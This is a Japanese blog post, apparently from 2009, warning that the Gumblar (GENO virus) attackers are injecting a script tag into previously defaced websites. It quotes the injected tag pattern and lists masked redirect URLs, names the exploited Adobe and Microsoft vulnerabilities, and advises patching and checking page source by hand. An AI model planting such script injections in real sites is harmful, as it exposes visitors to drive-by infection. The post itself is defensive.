ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫全体表示

 今年の2009年5月ぐらいに騒動となったウェブ改ざんの「Gumblar」「JSRedir-R」(通称、GENOウイルス)の攻撃者が新たな動きを見せてます。:(

 サイトのFTPパスワードが抜かれ、Adobe系ソフトの脆弱性を突く「gumblar.cn」「martuz.cn」へ飛ばす不正なコードをページに埋め込まれる、というものでしたが、その時に改ざんされて現在でも放置されたままのサイトに、先週あたりから何だか新しいコードが挿入され始めてるのに気づきました。

 HEADタグの終端とBODYタグの間(BODYタグの直前)に、下のようなJavaScriptタグが挿入されてます。src属性に「"」(クォーテーション)のくくりがなく、「〜.php」の直後に必ず半角スペースがあります。
</head>
〜
<script src=http://*****/*****.php ></script><body ...
 外部の飛び先の例をいくつか挙げると下のように色々とあり、必ずPHPファイル(〜.php)を呼ぶ形になってます。ここで呼ばれてる所はほとんど正規サイトのようです。(ドメイン名は「X X X」に置き換えてます)
http://X X X.ac.jp/course/VIVID.php
http://X X X.cn/images-d/index2.php
http://X X X.com/cpl/401.php
http://X X X.ru/files/configuration.php
http://X X X.ro/images/flvplayer.php
http://X X X.com/images/index.php
http://X X X.ru/downloads/wp-feed.php
http://X X X.com/public_html/1.php
http://X X X.com/images/pas1_bg.php 
http://X X X.com/class/chat/localization/finnish/sort_languages.php
   :
   :
 今回は、「Adobe Reader」、「Adobe Flash Player」、「Microsoft Office」(MS09-043)、「Internet Explorer 7」(MS09-002)の脆弱性を悪用して、ウイルス本体を発動させようとするようです。(飛び先で用意されてる不正コードの画像
☆ Adobe系ソフトウェア「Adobe Flash Player」「Adobe Reader」を最新版へ更新
☆ Windows Update(Microsoft Update)でMicrosoft系ソフトウェアの更新

◆ 自分のサイトに不正なJavaScriptコードが埋め込まれてるか確認するには?
 あくまで今回の再来襲だけ限定すると、対応してないオンラインチェッカーが複数存在します。

 悪用される脆弱性をちゃんと解消し、ブラウザのJavaScriptを無効にして、インターネット上のページのHTMLソースを実際に目視で確認するのが手っ取り早いです。FTPのパスワードが盗まれて外部から不正なコードを挿入される形なので、「FFFTP」のようなFTPクライアントソフトを使って自分のページの更新してる方が対象です。

Gumblar(GENOウイルス)の最新情報はコチラ10月再来襲のQ&A集



(追記...)
 過去に改ざん経験がないと思われる日本の個人サイトや会社サイトもいくつか被害を受けてる感じ? 有名女優さんが所属する芸能事務所の公式サイトが陥落しとる・・・。

この記事に

顔アイコン

顔アイコン・表示画像の選択

絵文字
×
  • オリジナル
  • SoftBank1
  • SoftBank2
  • SoftBank3
  • SoftBank4
  • docomo1
  • docomo2
  • au1
  • au2
  • au3
  • au4
  • 名前
  • パスワード
  • ブログ

開くトラックバック(1)

本文はここまでですこのページの先頭へ
みんなの更新記事